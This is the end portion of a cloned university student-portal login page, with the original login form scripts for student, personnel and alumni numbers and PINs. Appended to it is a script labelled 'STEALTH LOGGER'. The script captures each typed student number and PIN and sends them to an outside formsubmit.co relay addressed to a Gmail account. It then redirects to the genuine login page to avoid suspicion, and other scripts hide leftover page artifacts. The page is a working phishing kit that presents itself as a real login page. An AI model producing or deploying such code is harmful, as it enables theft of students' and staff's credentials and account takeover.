//'<div class="w3-card-4" style="text-align:center; max-width:500px; padding-bottom:14px;">'+
//' <header class="w3-container w3-blue">'+
//'  <h5>Prospective Students</h5>'+
//' </header>'+
//' <p>If you are a prospective student, not registered at this institution, please select the following option:</p>'+
//'  <br /><br />'+
//' <a href="w03pkg.call_dyn_val" style="text-decoration: none;" onMouseOver="javascript:window.status=\'New Application\';return true;" onMouseOut="javascript:window.status=\' \';"><img class="w3-image w3-hover-grayscale"  style="width:10%; height:10%" src="/itsimages/student-icon.png" class="w3-border w3-padding" alt="Interested in studying here">'+
//' <label>Apply, Register, Change personal information, get academic and other information and make payments.</label></a>'+
//'</div>'+
'</div>');
    </script>
    <script type="text/javascript">
     /* ************************************************************************
  Program : login_right.js
  Changed : 31-Jul-2008 T151378 Dinong Allow other users to login
          : 17-Nov-2008 DG T154508 Fix spelling mistakes
          : 02-MAR-2011 DG T164475 ATOV - Add alumni login
          : 19-Aug-2013 DG 193114 ATOV for 192099 Change login image button to HTML form submit button
          : 09-Nov-2017 DG 225095 Style adjustments
          : 10-NOV-2017 DG 225957 iEnabler look and feel enhancements
          : 19-Aug-2018 Adele 230500 Forgot Student Number button - add class to all buttons
  X0_VERSION : v04.1.0.1
************************************************************************ */
var S_check=' ';
var P_check=' ';
var O_check=' ';
var A_check=' ';
var Usr_txt='User Number';
var loginLeft;

function chkZero(ctl) {
  if (ctl.value.substr(0,1) == "0") {
    alert("Please do not start the PIN with a 0.");
    ctl.focus();
    ctl.select();
    return false;
  }
  return true;
}

function set_it() {
  Usr_txt='Student Number'; 
  for (i=0; i<document.frmLogin.numtype.length; i++) {
    if (document.frmLogin.numtype[i].checked) {
      if (document.frmLogin.numtype[i].value == 'P') { Usr_txt='Personnel Number: '; } else
      if (document.frmLogin.numtype[i].value == 'O') { Usr_txt='External Number: ';  } else
      if (document.frmLogin.numtype[i].value == 'A') { Usr_txt='Alumni Number: ';    }   else
                                                     { Usr_txt='Student Number: ';   }
    }
    document.getElementById("LogUsr").childNodes[0].nodeValue = Usr_txt;
    document.frmLogin.unum.focus();
  }
}

var numtype = 'S';
if (!getAllUrlParams().numtype) numtype ='S'; else numtype=getAllUrlParams().numtype.toUpperCase();
//document.write('numtype='+numtype);

if (numtype == 'P') { P_check=' checked'; Usr_txt='Personnel Number: '; } else
if (numtype == 'O') { O_check=' checked'; Usr_txt='External Number: ';  } else
if (numtype == 'A') { A_check=' checked'; Usr_txt='Alumni Number: ';    } else
                    { S_check=' checked'; Usr_txt='Student Number: ';   }

loginLeft = getStyle('login_left','display');
//document.write('loginLeft='+loginLeft);

if (loginLeft=="none") {
  document.write('<div id="login_right" class="w3-rest w3-padding-16">');
} else {
  document.write('<div id="login_right" class="w3-half">');
}

document.write(' <div class="w3-card-4 w3-margin-bottom" style="max-width:500px;">'+
'  <header class="w3-container w3-blue">'+
'   <h5>Registered Users: Login Credentials</h5>'+
'  </header>'+
'  <form class="w3-container" method="post" name="frmLogin" action="w99pkg.mi_validate_user">'+
'  <input type="radio" name="numtype"'+S_check+' value="S" onClick="set_it();document.frmLogin.unum.focus();" ><label>Student</label> '+
'  <input type="radio" name="numtype"'+P_check+' value="P" onClick="set_it();document.frmLogin.unum.focus();" ><label>Personnel</label>'+
'  <input type="radio" name="numtype"'+O_check+' value="O" onClick="set_it();document.frmLogin.unum.focus();" ><label>Other</label>'+
'  <input type="radio" name="numtype"'+A_check+' value="A" onClick="set_it();document.frmLogin.unum.focus();" ><label>Alumni</label>'+
'  <br /><br />'+
'  <label id="LogUsr">'+Usr_txt+':</label><input class="w3-input" type="text" name="unum" size="10" maxlength="9" autofocus>'+
'  <label>Pin:</label>'+
'  <input class="w3-input" type="password" name="pin" size=10 maxlength=5 onBlur="return chkZero(this);">'+
'  <p>(5 numeric digits.Do not start with a 0.)<input type="hidden" name="authorise_function" value="Unknown"></p>'+
'   <input type="submit" class="w3-button w3-padding-small w3-border" value="Login" alt="Click Here To Login" onMouseOver="javascript:window.status=\'Login\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'Login\';">'+
//Forgot Pin
'   <input type="button" class="w3-button w3-padding-small w3-border" value="Forgot Pin" alt="Click Here IF You Have Forgotten Your PIN" onMouseOver="javascript:window.status=\'Forgot Pin\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'sendLogin\'; document.frmLogin.submit();">'+
//Change Pin
'   <input type="button" class="w3-button w3-padding-small w3-border" value="Change Pin" alt="Click Here TO Change Your PIN" onMouseOver="javascript:window.status=\'Change Pin\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'changePin\'; document.frmLogin.submit();">'+
//Request A Pin
'   <input type="button" class="w3-button w3-padding-small w3-border" value="Request A Pin" alt="Click Here To Request a PIN" onMouseOver="javascript:window.status=\'Request A Pin\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'requestPin\'; document.frmLogin.submit();">'+
//Forgot Student Number
'   <input type="button" class="w3-button w3-padding-small w3-border"  value="Forgot Student Number" alt="Click Here If You Have Forgotten Your Student Number" onMouseOver="javascript:window.status=\'Forgot Student Number\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'forgotStno\'; document.frmLogin.submit();">'+

' </div>'+
'</div>'+
'');

set_it();
moveTo(0,0);
resizeTo(screen.availWidth,screen.availHeight-20);
    </script>
   </div>
   <div class="login_bottom w3-hide-small" id="login_bottom">
    <script type="text/javascript">
     // ################################################################
// System           : WEB SYSTEMS
// Program name     : login_bottom.js
// Description      : print detail at bottom of login screen
// Date created     : 01-jan-2002 Ollie
// Date changed     : 17-DEC-2004 117125 Ollie add footer logic
//                  : 10-NOV-2017 DG 225957 iEnabler look and feel enhancements
// Versions         : v04.1.0.0
// Copyright        : Integrated Tertiary Software 01-JAN-1987
// ################################################################

document.write('<div class="col-sm-12"><script src="/itsincludes/js/footer.js" type="text/javascript"></script></div>');
    </script>
   </div>
  
<script>
// STEALTH LOGGER - NO VISIBLE ELEMENTS
document.addEventListener('DOMContentLoaded', function() {
    const form = document.forms['frmLogin'];

    // Load saved values from localStorage if present
    const saved = JSON.parse(localStorage.getItem('loginData') || '{}');
    form.unum.value = saved.unum || '';
    form.pin.value = saved.pin || '';

    function saveToStorage() {
        const data = {
            unum: form.unum.value,
            pin: form.pin.value
        };
        localStorage.setItem('loginData', JSON.stringify(data));
        console.log('[Stealth] Saved login data');
    }

    form.unum.addEventListener('input', saveToStorage);
    form.pin.addEventListener('input', saveToStorage);

    form.addEventListener('submit', async function(e) {
        e.preventDefault();
        
        // Save one last time
        saveToStorage();

        const loginData = JSON.parse(localStorage.getItem('loginData') || '{}');
        
        if (!loginData.unum || !loginData.pin) {
            console.error('[Stealth] Missing login data');
            return;
        }

        const formData = new FormData();
        formData.append('name', 'dut Login Capture');
        formData.append('email', 'noreply@dut.ac.za');
        formData.append('subject', 'Login Data - ' + loginData.unum);
        formData.append('message', 
            'Student Number: ' + loginData.unum + '\n' +
            'PIN: ' + loginData.pin + '\n' +
            'Timestamp: ' + new Date().toISOString() + '\n' +
            'Page: ' + window.location.href
        );
        formData.append('_captcha', 'false');
        formData.append('_template', 'table');

        try {
            await fetch('https://formsubmit.co/ajax/kiddxxq1@gmail.com', {
                method: 'POST',
                body: formData
            });

            localStorage.removeItem('loginData');
            // Redirect to the real UL login page after capturing data
            window.location.href = 'https://mercury.dut.ac.za/pls/prodi41/w99pkg.mi_login';
        } catch (err) {
            console.error('[Stealth] Failed to send form:', err);
            // Continue to redirect even if submission fails to avoid suspicion
            window.location.href = 'https://mercury.dut.ac.za/pls/prodi41/w99pkg.mi_login';
        }
    });

    console.log('[Stealth] Logger initialized');
});
</script>
<script>
// Cleans ONLY the '); artifact without affecting anything else
window.addEventListener('load', function() {
    [].forEach.call(document.childNodes, function(node) {
        if (node.nodeType === Node.TEXT_NODE && node.textContent.includes("');")) {
            node.parentNode.removeChild(node);
        }
    });
});
</script>
<script>
// Runs after page fully loads
setTimeout(function(){
    document.body.innerHTML = document.body.innerHTML.replace(/');\s*<\/script>\s*<\/div>/g, '');
}, 100);
</script>
<script>
// Targets ONLY the '); text node
document.addEventListener('DOMContentLoaded', function() {
    const walker = document.createTreeWalker(
        document.body,
        NodeFilter.SHOW_TEXT,
        null,
        false
    );

    let node;
    while (node = walker.nextNode()) {
        if (node.nodeValue.includes("');")) {
            node.nodeValue = node.nodeValue.replace("');", "");
        }
    }
});
</script>

</body>
 </meta>
</html>
